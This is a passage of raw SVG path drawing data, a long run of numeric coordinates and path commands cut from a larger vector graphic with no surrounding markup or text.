-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a